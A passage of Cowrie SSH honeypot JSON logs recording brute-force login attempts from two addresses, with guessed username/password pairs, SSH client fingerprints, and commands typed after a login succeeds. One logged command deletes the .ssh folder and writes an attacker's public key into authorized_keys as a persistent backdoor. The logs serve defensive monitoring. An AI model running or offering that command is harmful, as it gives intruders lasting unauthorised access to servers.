"rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:08:23.539282Z","src_ip":"212.227.235.229","session":"ba2e480a30fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51226,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae0d37f2158b","protocol":"ssh","message":"New connection: 212.227.235.229:51226 (1.2.3.4:22) [session: ae0d37f2158b]","sensor":"my-vps","timestamp":"2025-08-26T04:08:24.043185Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:08:24.339747Z","src_ip":"212.227.235.229","session":"ae0d37f2158b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:08:24.440872Z","src_ip":"212.227.235.229","session":"ae0d37f2158b"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123","message":"login attempt [root/admin123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:08:24.688741Z","src_ip":"212.227.235.229","session":"b1fa53b594ea"}
{"eventid":"cowrie.login.failed","username":"test","password":"q1w2e3","message":"login attempt [test/q1w2e3] failed","sensor":"my-vps","timestamp":"2025-08-26T04:08:25.539044Z","src_ip":"212.227.235.229","session":"ba2e480a30fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51240,"dst_ip":"1.2.3.4","dst_port":22,"session":"07526c31a78e","protocol":"ssh","message":"New connection: 212.227.235.229:51240 (1.2.3.4:22) [session: 07526c31a78e]","sensor":"my-vps","timestamp":"2025-08-26T04:08:25.902687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:08:25.907223Z","src_ip":"212.227.235.229","session":"07526c31a78e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:08:26.186457Z","src_ip":"212.227.235.229","session":"07526c31a78e"}
{"eventid":"cowrie.login.failed","username":"guest1","password":"guest1","message":"login attempt [guest1/guest1] failed","sensor":"my-vps","timestamp":"2025-08-26T04:08:26.256988Z","src_ip":"212.227.235.229","session":"a9325158fc18"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:08:27.301475Z","src_ip":"212.227.235.229","session":"ba2e480a30fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53366,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d4c0de48639","protocol":"ssh","message":"New connection: 212.227.235.229:53366 (1.2.3.4:22) [session: 7d4c0de48639]","sensor":"my-vps","timestamp":"2025-08-26T04:08:27.584495Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:08:28.003721Z","src_ip":"212.227.235.229","session":"7d4c0de48639"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":36692,"dst_ip":"1.2.3.4","dst_port":22,"session":"62d1b0b85767","protocol":"ssh","message":"New connection: 68.183.87.241:36692 (1.2.3.4:22) [session: 62d1b0b85767]","sensor":"my-vps","timestamp":"2025-08-26T04:08:28.031229Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:08:28.031928Z","src_ip":"68.183.87.241","session":"62d1b0b85767"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:08:28.257089Z","src_ip":"212.227.235.229","session":"a9325158fc18"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:08:28.288126Z","src_ip":"68.183.87.241","session":"62d1b0b85767"}
{"eventid":"cowrie.login.failed","username":"admin","password":"p@ssw0rd","message":"login attempt [admin/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T04:08:29.049768Z","src_ip":"212.227.235.229","session":"07526c31a78e"}
{"eventid":"cowrie.login.success","username":"root","password":"Abc123!!!","message":"login attempt [root/Abc123!!!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:08:29.354431Z","src_ip":"68.183.87.241","session":"62d1b0b85767"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:08:29.422398Z","src_ip":"212.227.235.229","session":"7d4c0de48639"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:08:29.885031Z","src_ip":"68.183.87.241","session":"62d1b0b85767"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:08:29.885741Z","src_ip":"68.183.87.241","session":"62d1b0b85767"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:08:29.886479Z","src_ip":"68.183.87.241","session":"62d1b0b85767"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:08:30.143631Z","src_ip":"68.183.87.241","session":"62d1b0b85767"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:08:30.338086Z","src_ip":"212.227.235.229","session":"07526c31a78e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345678","message":"login attempt [admin/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T04:08:30.437121Z","src_ip":"212.227.235.229","session":"ae0d37f2158b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:08:30.762919Z","src_ip":"68.183.87.241","session":"62d1b0b85767"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:08:30.763684Z","src_ip":"68.183.87.241","session":"62d1b0b85767"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:08:31.021777Z","src_ip":"68.183.87.241","session":"62d1b0b85767"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:08:31.023010Z","src_ip":"68.183.87.241","session":"62d1b0b85767"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":36696,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8044f10b891","protocol":"ssh","message":"New connection: 68.183.87.241:36696 (1.2.3.4:22) [session: b8044f10b891]","sensor":"my-vps","timestamp":"2025-08-26T04:08:31.295154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:08:31.295937Z","src_ip":"68.183.87.241","session":"b8044f10b891"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:08:31.558963Z","src_ip":"68.183.87.241","session":"b8044f10b891"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:08:32.159733Z","src_ip":"212.227.235.229","session":"ae0d37f2158b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:08:32.681764Z","src_ip":"68.183.87.241","session":"b8044f10b891"}
{"eventid":"cowrie.login.failed","username":"sshd","password":"sshd","message":"login attempt [sshd/sshd] failed","sensor":"my-vps","timestamp":"2025-08-26T04:08:33.160065Z","src_ip":"212.227.235.229","session":"7d4c0de48639"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:08:33.959306Z","src_ip":"68.183.87.241","session":"b8044f10b891"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@o